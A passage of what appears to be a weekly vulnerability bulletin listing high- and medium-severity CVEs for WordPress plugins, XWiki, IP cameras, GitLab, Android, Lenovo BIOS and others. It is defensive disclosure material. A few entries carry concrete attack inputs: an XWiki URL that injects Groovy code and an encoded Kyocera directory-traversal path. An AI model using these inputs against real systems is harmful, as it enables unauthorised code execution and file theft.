wordpress — wordpress Cross-Site Request Forgery (CSRF) leading to a Stored Cross-Site Scripting (XSS) vulnerability in Nazmul Hossain Nihal Login Screen Manager plugin <= 3.5.2 versions. 2023-11-06 8.8 CVE-2023-47182
MISC
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Kadence WP Kadence WooCommerce Email Designer plugin <= 1.5.11 versions. 2023-11-06 8.8 CVE-2023-47186
MISC
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WebberZone Top 10 – WordPress Popular posts by WebberZone plugin <= 3.3.2 versions. 2023-11-09 8.8 CVE-2023-47238
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in ThemeKraft TK Google Fonts GDPR Compliant plugin <= 2.2.11 versions. 2023-11-06 8.8 CVE-2023-5823
MISC
wordpress — wordpress The Awesome Support WordPress plugin before 6.1.5 does not sanitize file paths when deleting temporary attachment files, allowing a ticket submitter to delete arbitrary files on the server. 2023-11-06 8.1 CVE-2023-5355
MISC
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in Solwin Infotech User Blocker. This issue affects User Blocker: from n/a through 1.5.5. 2023-11-07 7.2 CVE-2022-45078
wordpress — wordpress Improper Neutralization of Formula Elements in a CSV File vulnerability in WPEkaClub WP Cookie Consent ( for GDPR, CCPA & ePrivacy ).This issue affects WP Cookie Consent ( for GDPR, CCPA & ePrivacy ): from n/a through 2.2.5. 2023-11-07 7.2 CVE-2023-23678
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Highfivery LLC Zero Spam for WordPress allows SQL Injection.This issue affects Zero Spam for WordPress: from n/a through 5.4.4. 2023-11-03 7.2 CVE-2023-32121
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Rolf van Gelder Order Your Posts Manually allows SQL Injection.This issue affects Order Your Posts Manually: from n/a through 2.2.5. 2023-11-03 7.2 CVE-2023-32508
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in IT Path Solutions PVT LTD Contact Form to Any API allows SQL Injection.This issue affects Contact Form to Any API: from n/a through 1.1.2. 2023-11-04 7.2 CVE-2023-32741
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Groundhogg Inc. Groundhogg allows SQL Injection.This issue affects Groundhogg: from n/a through 2.7.11. 2023-11-03 7.2 CVE-2023-34179
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Themesgrove Onepage Builder allows SQL Injection.This issue affects Onepage Builder: from n/a through 2.4.1. 2023-11-04 7.2 CVE-2023-38391
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Demonisblack demon image annotation allows SQL Injection.This issue affects demon image annotation: from n/a through 5.1. 2023-11-04 7.2 CVE-2023-40215
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Milan Petrovic GD Security Headers allows auth. (admin+) SQL Injection.This issue affects GD Security Headers: from n/a through 1.7. 2023-11-06 7.2 CVE-2023-46821
MISC
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Avirtum ImageLinks Interactive Image Builder for WordPress allows SQL Injection.This issue affects ImageLinks Interactive Image Builder for WordPress: from n/a through 1.5.4. 2023-11-06 7.2 CVE-2023-46823
MISC
wordpress — wordpress The History Log by click5 WordPress plugin before 1.0.13 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin users when using the Smash Balloon Social Photo Feed plugin alongside it. 2023-11-06 7.2 CVE-2023-5082
MISC
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Martin Gibson Auto Publish for Google My Business plugin <= 3.7 versions. 2023-11-09 8.8 CVE-2023-47237
wpn-xm — wpn-xm A local file inclusion vulnerability has been found in WPN-XM Serverstack affecting version 0.8.6, which would allow an unauthenticated user to perform a local file inclusion (LFI) via the /tools/webinterface/index.php?page parameter by sending a GET request. This vulnerability could lead to the loading of a PHP file on the server, leading to a critical webshell exploit. 2023-11-03 9.8 CVE-2023-4591
MISC
xwiki — xwiki XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. XWiki doesn’t properly escape the section URL parameter that is used in the code for displaying administration sections. This allows any user with read access to the document `XWiki.AdminSheet` (by default, everyone including unauthenticated users) to execute code including Groovy code. This impacts the confidentiality, integrity and availability of the whole XWiki instance. This vulnerability has been patched in XWiki 14.10.14, 15.6 RC1 and 15.5.1. Users are advised to upgrade. Users unablr to upgrade may apply the fix in commit `fec8e0e53f9` manually. Alternatively, to protect against attacks from unauthenticated users, view right for guests can be removed from this document (it is only needed for space and wiki admins). 2023-11-06 9.8 CVE-2023-46731
MISC
MISC
MISC
MISC
xwiki — xwiki XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions it’s possible to execute a content with the right of any user via a crafted URL. A user must have `programming` privileges in order to exploit this vulnerability. This issue has been patched in XWiki 14.10.7 and 15.2RC1. Users are advised to upgrade. There are no known workarounds for for this vulnerability. 2023-11-07 8.8 CVE-2023-46242

 

xwiki — xwiki XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions it’s possible for a user to execute any content with the right of an existing document’s content author, provided the user have edit right on it. A crafted URL of the form ` /xwiki/bin/edit//?content=%7B%7Bgroovy%7D%7Dprintln%28%22Hello+from+Groovy%21%22%29%7B%7B%2Fgroovy%7D%7D&xpage=view` can be used to execute arbitrary groovy code on the server. This vulnerability has been patched in XWiki versions 14.10.6 and 15.2RC1. Users are advised to update. There are no known workarounds for this issue. 2023-11-07 8.8 CVE-2023-46243

 

xwiki — xwiki XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions it’s possible for a user to write a script in which any velocity content is executed with the right of any other document content author. Since this API require programming right and the user does not have it, the expected result is `$doc.document.authors.contentAuthor` (not executed script), unfortunately with the security vulnerability it is possible for the attacker to get `XWiki.superadmin` which shows that the title was executed with the right of the unmodified document. This has been patched in XWiki versions 14.10.7 and 15.2RC1. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-07 8.8 CVE-2023-46244

 

xxyopen — novel-plus SQL injection vulnerability in Novel-Plus v.4.2.0 allows a remote attacker to execute arbitrary code via a crafted script to the sort parameter in /common/log/list. 2023-11-05 9.8 CVE-2023-46981
MISC
zavio — cf7500_firmware Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras with firmware version M2.1.6.05 are vulnerable to stack-based overflows. During the process of updating certain settings sent from incoming network requests, the product does not sufficiently check or validate allocated buffer size. This may lead to remote code execution. 2023-11-08 9.8 CVE-2023-39435
zavio — cf7500_firmware Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras with firmware version M2.1.6.05 are vulnerable to multiple instances of stack-based overflows. While processing XML elements from incoming network requests, the product does not sufficiently check or validate allocated buffer size. This may lead to remote code execution. 2023-11-08 9.8 CVE-2023-3959
zavio — cf7500_firmware Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras with firmware version M2.1.6.05 has a command injection vulnerability in their implementation of their binaries and handling of network requests. 2023-11-08 9.8 CVE-2023-4249
zavio — cf7500_firmware Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras with firmware version M2.1.6.05 are vulnerable to multiple instances of stack-based overflows. During the processing and parsing of certain fields in XML elements from incoming network requests, the product does not sufficiently check or validate allocated buffer size. This may lead to remote code execution. 2023-11-08 9.8 CVE-2023-43755
zavio — cf7500_firmware Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras  with firmware version M2.1.6.05 are vulnerable to multiple instances of stack-based overflows. While parsing certain XML elements from incoming network requests, the product does not sufficiently check or validate allocated buffer size. This may lead to remote code execution. 2023-11-08 9.8 CVE-2023-45225
zohocorp — manageengine_desktop_central A SSRF vulnerability has been found in ManageEngine Desktop Central affecting version 9.1.0, specifically the /smtpConfig.do component. This vulnerability could allow an authenticated attacker to launch targeted attacks, such as a cross-port attack, service enumeration and other attacks via HTTP requests. 2023-11-03 8.8 CVE-2023-4769
MISC

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
apache — allura Allura Discussion and Allura Forum importing does not restrict URL values specified in attachments. Project administrators can run these imports, which could cause Allura to read local files and expose them.  Exposing internal files then can lead to other exploits, like session hijacking, or remote code execution. This issue affects Apache Allura from 1.0.1 through 1.15.0. Users are recommended to upgrade to version 1.16.0, which fixes the issue.  If you are unable to upgrade, set “disable_entry_points.allura.importers = forge-tracker, forge-discussion” in your .ini config file. 2023-11-07 4.9 CVE-2023-46851
 
apache — ofbiz Missing Authentication in Apache Software Foundation Apache OFBiz when using the Solr plugin. This issue affects Apache OFBiz: before 18.12.09.  Users are recommended to upgrade to version 18.12.09 2023-11-07 5.3 CVE-2023-46819

 

arm — bifrost_gpu_kernel_driver A local non-privileged user can make GPU processing operations that expose sensitive data from previously freed memory. 2023-11-07 5.5 CVE-2023-4272
bootboxjs — bootbox Cross Site Scripting vulnerability in BootBox Bootbox.js v.3.2 through 6.0 allows a remote attacker to execute arbitrary code via a crafted payload to alert(), confirm(), prompt() functions. 2023-11-07 6.1 CVE-2023-46998
 
clastix — capsule capsule-proxy is a reverse proxy for Capsule kubernetes multi-tenancy framework. A bug in the RoleBinding reflector used by `capsule-proxy` gives ServiceAccount tenant owners the right to list Namespaces of other tenants backed by the same owner kind and name. For example, consider two tenants `solar` and `wind`. Tenant `solar`, owned by a ServiceAccount named `tenant-owner` in the Namespace `solar`. Tenant `wind`, owned by a ServiceAccount named `tenant-owner` in the Namespace `wind`. The Tenant owner `solar` would be able to list the namespaces of the Tenant `wind` and vice-versa, although this is not correct. The bug introduces an exfiltration vulnerability since allows the listing of Namespace resources of other Tenants, although just in some specific conditions: 1. `capsule-proxy` runs with the `–disable-caching=false` (default value: `false`) and 2. Tenant owners are ServiceAccount, with the same resource name, but in different Namespaces. This vulnerability doesn’t allow any privilege escalation on the outer tenant Namespace-scoped resources, since the Kubernetes RBAC is enforcing this. This issue has been addressed in version 0.4.5. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-06 4.3 CVE-2023-46254
MISC
MISC
cloudnet360 — cloudnet360 Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in GARY JEZORSKI CloudNet360 plugin <= 3.2.0 versions. 2023-11-08 6.1 CVE-2023-46643
color — demoiccmax In International Color Consortium DemoIccMAX 79ecb74, a CIccXmlArrayType:::ParseText function (for unsigned short) in IccUtilXml.cpp in libIccXML.a has an out-of-bounds read. 2023-11-05 6.5 CVE-2023-47249
MISC
cure53 — dompurify DOMPurify before 1.0.11 allows reverse tabnabbing in demos/hooks-target-blank-demo.html because links lack a ‘rel=”noopener noreferrer”‘ attribute. 2023-11-07 6.1 CVE-2019-25155
 
docker — machine Docker Machine through 0.16.2 allows an attacker, who has control of a worker node, to provide crafted version data, which might potentially trick an administrator into performing an unsafe action (via escape sequence injection), or might have a data size that causes a denial of service to a bastion node. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. 2023-11-07 6.5 CVE-2023-40453

 

dstar2018 — agency A vulnerability classified as problematic was found in dstar2018 Agency up to 61. Affected by this vulnerability is an unknown functionality of the file search.php. The manipulation of the argument QSType/QuickSearch leads to cross site scripting. The attack can be launched remotely. The patch is named 975b56953efabb434519d9feefcc53685fb8d0ab. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-244495. 2023-11-07 6.1 CVE-2019-25156

 

gitlab — gitlab An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.3 before 16.3.6, all versions starting from 16.4 before 16.4.2, all versions starting from 16.5 before 16.5.1. A Regular Expression Denial of Service was possible by adding a large string in timeout input in gitlab-ci.yml file. 2023-11-06 6.5 CVE-2023-3909
MISC
MISC
gitlab — gitlab An authorization issue affecting GitLab EE affecting all versions from 14.7 prior to 16.3.6, 16.4 prior to 16.4.2, and 16.5 prior to 16.5.1, allowed a user to run jobs in protected environments, bypassing any required approvals. 2023-11-06 6.5 CVE-2023-4700
MISC
MISC
gitlab — gitlab An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.2 before 16.3.6, all versions starting from 16.4 before 16.4.2, all versions starting from 16.5 before 16.5.1. A low-privileged attacker can point a CI/CD Component to an incorrect path and cause the server to exhaust all available memory through an infinite loop and cause Denial of Service. 2023-11-06 6.5 CVE-2023-5825
MISC
MISC
gitlab — gitlab An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.0 before 16.3.6, all versions starting from 16.4 before 16.4.2, and all versions starting from 16.5.0 before 16.5.1 which have the `super_sidebar_logged_out` feature flag enabled. Affected versions with this default-disabled feature flag enabled may unintentionally disclose GitLab version metadata to unauthorized actors. 2023-11-06 5.3 CVE-2023-5831
MISC
gitlab — gitlab An issue has been discovered in GitLab EE/CE affecting all versions starting before 16.3.6, all versions starting from 16.4 before 16.4.2, all versions starting from 16.5 before 16.5.1 which allows an attacker to block Sidekiq job processor. 2023-11-06 4.3 CVE-2023-3246
MISC
MISC
gitlab — gitlab An issue has been discovered in GitLab EE with Advanced Search affecting all versions from 13.9 to 16.3.6, 16.4 prior to 16.4.2 and 16.5 prior to 16.5.1 that could allow a denial of service in the Advanced Search function by chaining too many syntax operators. 2023-11-06 4.3 CVE-2023-5963
MISC
google — android In vdec, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08163896 & ALPS08013430; Issue ID: ALPS07867715. 2023-11-06 6.7 CVE-2023-32818
MISC
google — android In secmem, there is a possible memory corruption due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08161762; Issue ID: ALPS08161762. 2023-11-06 6.7 CVE-2023-32834
MISC
google — android In keyinstall, there is a possible memory corruption due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08157918; Issue ID: ALPS08157918. 2023-11-06 6.7 CVE-2023-32835
MISC
google — android In display, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08126725; Issue ID: ALPS08126725. 2023-11-06 6.7 CVE-2023-32836
MISC
google — android In dpe, there is a possible out of bounds write due to a missing valid range checking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07310805; Issue ID: ALPS07310805. 2023-11-06 6.7 CVE-2023-32838
MISC
google — android In dpe, there is a possible out of bounds write due to a missing valid range checking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07262576; Issue ID: ALPS07262576. 2023-11-06 6.7 CVE-2023-32839
MISC
google — android In bluethooth service, there is a possible out of bounds reads due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07884130; Issue ID: ALPS07884130. 2023-11-06 5.5 CVE-2023-32825
MISC
gvectors — wpdiscuz Unauth. Stored Cross-Site Scripting (XSS) vulnerability in gVectors Team Comments – wpDiscuz plugin <= 7.6.11 versions. 2023-11-06 6.1 CVE-2023-47185
MISC
hillstonenet — sc-6000-e3960_firmware Cross Site Scripting (XSS) vulnerability in Hillstone Next Generation FireWall SG-6000-e3960 v.5.5 allows a remote attacker to execute arbitrary code via the use front-end filtering instead of back-end filtering. 2023-11-05 6.1 CVE-2023-46964
MISC
huawei — emui Race condition vulnerability in the kernel module. Successful exploitation of this vulnerability may cause variable values to be read with the condition evaluation bypassed. 2023-11-08 5.9 CVE-2022-48613
 
huawei — emui Vulnerability of input parameters being not strictly verified in the input. Successful exploitation of this vulnerability may cause the launcher to restart. 2023-11-08 5.3 CVE-2023-46755
 
huawei — emui Vulnerability of background app permission management in the framework module. Successful exploitation of this vulnerability may cause background apps to start maliciously. 2023-11-08 5.3 CVE-2023-46763
 
huawei — emui Unauthorized startup vulnerability of background apps. Successful exploitation of this vulnerability may cause background apps to start maliciously. 2023-11-08 5.3 CVE-2023-46764
 
huawei — harmonyos Permission control vulnerability in the window management module. Successful exploitation of this vulnerability may cause malicious pop-up windows. 2023-11-08 5.3 CVE-2023-46756
 
ibm — content_navigator IBM Content Navigator 3.0.13 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 259247. 2023-11-03 5.4 CVE-2023-35896
MISC
MISC
ibm — robotic_process_automation_for_cloud_pak A vulnerability in IBM Robotic Process Automation and IBM Robotic Process Automation for Cloud Pak 21.0.0 through 21.0.7.10, 23.0.0 through 23.0.10 may result in access to client vault credentials. This difficult to exploit vulnerability could allow a low privileged attacker to programmatically access client vault credentials. IBM X-Force ID: 268752. 2023-11-03 6.5 CVE-2023-45189
MISC
MISC
ibm — txseries_for_multiplatforms IBM CICS TX Standard 11.1, Advanced 10.1, 11.1, and TXSeries for Multiplatforms 8.1, 8.2, 9.1 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 266059. 2023-11-03 5.4 CVE-2023-42029
MISC
MISC
MISC
jbig2enc_project — jbig2enc jbig2enc v0.28 was discovered to contain a heap-use-after-free via jbig2enc_auto_threshold_using_hash in src/jbig2enc.cc. 2023-11-08 5.5 CVE-2023-46362
 
jbig2enc_project — jbig2enc jbig2enc v0.28 was discovered to contain a SEGV via jbig2_add_page in src/jbig2enc.cc:512. 2023-11-08 5.5 CVE-2023-46363
 
kaoshifeng — yunfan_learning_examination_system An issue in Beijing Yunfan Internet Technology Co., Ltd, Yunfan Learning Examination System v.6.5 allows a remote attacker to obtain sensitive information via the password parameter in the login function. 2023-11-04 5.3 CVE-2023-46963
MISC
kyocera — d-copia253mf_plus_firmware Kyocera TASKalfa 4053ci printers through 2VG_S000.002.561 allow identification of valid user accounts via username enumeration because they lead to a “nicht einloggen” error rather than a falsch error. 2023-11-03 5.3 CVE-2023-34261
MISC
MISC
kyocera — d-copia253mf_plus_firmware Kyocera TASKalfa 4053ci printers through 2VG_S000.002.561 allow /wlmdeu%2f%2e%2e%2f%2e%2e directory traversal to read arbitrary files on the filesystem, even files that require root privileges. NOTE: this issue exists because of an incomplete fix for CVE-2020-23575. 2023-11-03 4.9 CVE-2023-34259
MISC
MISC
lenovo — desktop_bios A buffer overflow was reported in the BiosExtensionLoader module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code. 2023-11-08 6.7 CVE-2023-43571
lenovo — desktop_bios A buffer overflow was reported in the LEMALLDriversConnectedEventHook module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code. 2023-11-08 6.7 CVE-2023-43573
lenovo — desktop_bios A buffer overflow was reported in the UltraFunctionTable module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code. 2023-11-08 6.7 CVE-2023-43575
lenovo — desktop_bios A buffer overflow was reported in the WMISwSmi module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code. 2023-11-08 6.7 CVE-2023-43576
lenovo — desktop_bios A buffer overflow was reported in the ReFlash module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code. 2023-11-08 6.7 CVE-2023-43577
lenovo — desktop_bios A buffer overflow was reported in the SmiFlash module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code. 2023-11-08 6.7 CVE-2023-43578
lenovo — desktop_bios A buffer overflow was reported in the SmuV11Dxe driver in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code. 2023-11-08 6.7 CVE-2023-43579
lenovo — desktop_bios A buffer overflow was reported in the SmuV11DxeVMR module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code. 2023-11-08 6.7 CVE-2023-43580
lenovo — desktop_bios A buffer overflow was reported in the Update_WMI module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code. 2023-11-08 6.7 CVE-2023-43581
lenovo — desktop_bios A buffer over-read was reported in the BiosExtensionLoader module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to disclose sensitive information. 2023-11-08 4.4 CVE-2023-43572
lenovo — desktop_bios A buffer over-read was reported in the LEMALLDriversConnectedEventHook module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to disclose sensitive information. 2023-11-08 4.4 CVE-2023-43574
linux — kernel The brcm80211 component in the Linux kernel through 6.5.10 has a brcmf_cfg80211_detach use-after-free in the device unplugging (disconnect the USB by hotplug) code. For physically proximate attackers with local access, this “could be exploited in a real world scenario.” This is related to brcmf_cfg80211_escan_timeout_worker in drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c. 2023-11-03 4.3 CVE-2023-47233
MISC
MISC
linux — linux_kernel A flaw was found in KVM. An improper check in svm_set_x2apic_msr_interception() may allow direct access to host x2apic msrs when the guest resets its apic, potentially leading to a denial of service condition. 2023-11-06 5.5 CVE-2023-5090
MISC
MISC
mattermost — mattermost Mattermost fails to properly sanitize the request to /api/v4/redirect_location allowing an attacker, sending a specially crafted request to /api/v4/redirect_location, to fill up the memory due to caching large items. 2023-11-06 5.3 CVE-2023-5969
MISC
mattermost — mattermost Mattermost fails to properly sanitize the user object when updating the username, resulting in the password hash being included in the response body.  2023-11-06 4.9 CVE-2023-5968
MISC
mattermost — mattermost Mattermost fails to properly validate requests to the Calls plugin, allowing an attacker sending a request without a User Agent header to cause a panic and crash the Calls plugin 2023-11-06 4.3 CVE-2023-5967
MISC
mediatek — lr12a In modem CCCI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction may be also needed for exploitation Patch ID: MOLY01138425; Issue ID: MOLY01138425 (MSV-862). 2023-11-06 6.5 CVE-2023-32840
MISC
mediawiki — mediawiki An issue was discovered in MediaWiki before 1.35.12, 1.36.x through 1.39.x before 1.39.5, and 1.40.x before 1.40.1. There is XSS in youhavenewmessagesmanyusers and youhavenewmessages i18n messages. This is related to MediaWiki:Youhavenewmessagesfromusers. 2023-11-03 5.4 CVE-2023-45360
MISC
mediawiki — mediawiki An issue was discovered in DifferenceEngine.php in MediaWiki before 1.35.12, 1.36.x through 1.39.x before 1.39.5, and 1.40.x before 1.40.1. diff-multi-sameuser (aka “X intermediate revisions by the same user not shown”) ignores username suppression. This is an information leak. 2023-11-03 4.3 CVE-2023-45362
MISC
microsoft — edge_chromium Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability 2023-11-03 6.6 CVE-2023-36022
MISC
microsoft — edge_chromium Microsoft Edge (Chromium-based) Information Disclosure Vulnerability 2023-11-07 6.5 CVE-2023-36409
MISC
microsoft — edge_chromium Microsoft Edge (Chromium-based) Spoofing Vulnerability 2023-11-03 4.3 CVE-2023-36029
MISC
microsoft — onenote Microsoft OneNote Spoofing Vulnerability 2023-11-06 5.4 CVE-2023-36769
MISC
microweber — microweber Microweber CMS version 2.0.1 is vulnerable to stored Cross Site Scripting (XSS) via the profile picture file upload functionality. 2023-11-08 5.4 CVE-2023-47379

 

microweber — microweber Improper Access Control in GitHub repository microweber/microweber prior to 2.0. 2023-11-07 4.3 CVE-2023-5976
 
mitsubishi_electric — fx5u-32mt/es_firmware Improper Restriction of Excessive Authentication Attempts vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F Series CPU modules Web server function allows a remote unauthenticated attacker to prevent legitimate users from logging into the Web server function for a certain period after the attacker has attempted to log in illegally by continuously attempting unauthorized login to the Web server function. The impact of this vulnerability will persist while the attacker continues to attempt unauthorized login. 2023-11-06 5.3 CVE-2023-4625
MISC
MISC
MISC
moodle — moodle The CSV grade import method contained an XSS risk for users importing the spreadsheet, if it contained unsafe content. 2023-11-09 6.1 CVE-2023-5541

 

moodle — moodle The course upload preview contained an XSS risk for users uploading unsafe data. 2023-11-09 6.1 CVE-2023-5547

 

moodle — moodle Wiki comments required additional sanitizing and access restrictions to prevent a stored XSS risk and potential IDOR risk. 2023-11-09 5.4 CVE-2023-5544

 

moodle — moodle ID numbers displayed in the quiz grading report required additional sanitizing to prevent a stored XSS risk. 2023-11-09 5.4 CVE-2023-5546

 

msyk — fmdataapi A vulnerability classified as problematic has been found in msyk FMDataAPI up to 22. Affected is an unknown function of the file FMDataAPI_Sample.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 23 is able to address this issue. The patch is identified as 3bd1709a8f7b1720529bf5dfc9855ad609f436cf. It is recommended to upgrade the affected component. VDB-244494 is the identifier assigned to this vulnerability. 2023-11-07 6.1 CVE-2021-4431

 

mybb — mybb MyBB is a free and open source forum software. Custom MyCode (BBCode) for the visual editor (_SCEditor_) doesn’t escape input properly when rendering HTML, resulting in a DOM-based XSS vulnerability. This weakness can be exploited by pointing a victim to a page where the visual editor is active (e.g. as a post or Private Message) and operates on a maliciously crafted MyCode message. This may occur on pages where message content is pre-filled using a GET/POST parameter, or on reply pages where a previously saved malicious message is quoted. The impact is be mitigated when: 1. the visual editor is disabled globally (_Admin CP ? Configuration ? Settings ? Clickable Smilies and BB Code: [Clickable MyCode Editor](https://github.com/mybb/mybb/blob/mybb_1836/install/resources/settings.xml#L2087-L2094)_ is set to _Off_), or 2. the visual editor is disabled for individual user accounts (_User CP ? Your Profile ? Edit Options_: _Show the MyCode formatting options on the posting pages_ checkbox is not checked). MyBB 1.8.37 resolves this issue with the commit `6dcaf0b4d`. Users are advised to upgrade. Users unable to upgrade may mitigate the impact without upgrading MyBB by changing the following setting (_Admin CP ? Configuration ? Settings_): – _Clickable Smilies and BB Code ? [Clickable MyCode Editor](https://github.com/mybb/mybb/blob/mybb_1836/install/resources/settings.xml#L2087-L2094)_: _Off_. Similarly, individual MyBB forum users are able to disable the visual editor by diabling the account option (_User CP ? Your Profile ? Edit Options_) _Show the MyCode formatting options on the posting pages_. 2023-11-06 6.1 CVE-2023-46251
MISC
MISC
MISC
mybb — mybb Cross Site Scripting vulnerability in Mybb Mybb Forums v.1.8.33 allows a local attacker to execute arbitrary code via the theme Name parameter in the theme management component. 2023-11-06 5.4 CVE-2023-45556
MISC
MISC
MISC
nasa — openmct Cross Site Request Forgery (CSRF) vulnerability in NASA Open MCT (aka openmct) through 3.1.0 allows attackers to view sensitive information via the flexibleLayout plugin. 2023-11-09 6.5 CVE-2023-45884
nasa — openmct Cross Site Scripting (XSS) vulnerability in NASA Open MCT (aka openmct) through 3.1.0 allows attackers to run arbitrary code via the new component feature in the flexibleLayout plugin. 2023-11-09 5.4 CVE-2023-45885
nationaledtech — boomerang An issue was discovered in the Boomerang Parental Control application before 13.83 for Android. The app is missing the android:allowBackup=”false” attribute in the manifest. This allows the user to back up the internal memory of the app to a PC. This gives the user access to the API token that is used to authenticate requests to the API. 2023-11-03 4.6 CVE-2023-36620
MISC
MISC
MISC
ni — topografix_data_plugin An incorrect permission assignment in the TopoGrafix DataPlugin for GPX could result in information disclosure. An attacker could exploit this vulnerability by getting a user to open a specially crafted data file. 2023-11-08 5.5 CVE-2023-5136
nta — e-tax e-Tax software Version3.0.10 and earlier improperly restricts XML external entity references (XXE) due to the configuration of the embedded XML parser. By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker. 2023-11-06 5.5 CVE-2023-46802
MISC
MISC
opensc_project — opensc A flaw was found in OpenSC packages that allow a potential PIN bypass. When a token/card is authenticated by one process, it can perform cryptographic operations in other processes when an empty zero-length pin is passed. This issue poses a security risk, particularly for OS logon/screen unlock and for small, permanently connected tokens to computers. Additionally, the token can internally track login status. This flaw allows an attacker to gain unauthorized access, carry out malicious actions, or compromise the system without the user’s awareness. 2023-11-06 6.6 CVE-2023-40660
MISC
MISC
MISC
MISC
MISC
opensc — opensc Several memory vulnerabilities were identified within the OpenSC packages, particularly in the card enrollment process using pkcs15-init when a user or administrator enrolls cards. To take advantage of these flaws, an attacker must have physical access to the computer system and employ a custom-crafted USB device or smart card to manipulate responses to APDUs. This manipulation can potentially allow compromise key generation, certificate loading, and other card management operations during enrollment. 2023-11-06 6.4 CVE-2023-40661
MISC
MISC
MISC
MISC
MISC
prestashop — prestashop blockreassurance adds an information block aimed at offering helpful information to reassure customers that their store is trustworthy. An ajax function in module blockreassurance allows modifying any value in the configuration table. This vulnerability has been patched in version 5.1.4. 2023-11-09 5.3 CVE-2023-47110
proofpoint — enterprise_protection Proofpoint Enterprise Protection contains a stored XSS vulnerability in the AdminUI. An unauthenticated attacker can send a specially crafted email with HTML in the subject which triggers XSS when viewing quarantined messages.  This issue affects Proofpoint Enterprise Protection: from 8.20.0 before patch 4796, from 8.18.6 before patch 4795 and all other prior versions. 2023-11-06 6.1 CVE-2023-5771
MISC
qnap — qts A server-side request forgery (SSRF) vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to read application data via a network. We have already fixed the vulnerability in the following versions: QTS 5.0.1.2514 build 20230906 and later QTS 5.1.1.2491 build 20230815 and later QuTS hero h5.0.1.2515 build 20230907 and later QuTS hero h5.1.1.2488 build 20230812 and later QuTScloud c5.1.0.2498 and later 2023-11-03 4.3 CVE-2023-39301
MISC
qualcomm — snapdragon Information Disclosure in WLAN Host when processing WMI event command. 2023-11-07 5.5 CVE-2023-28553
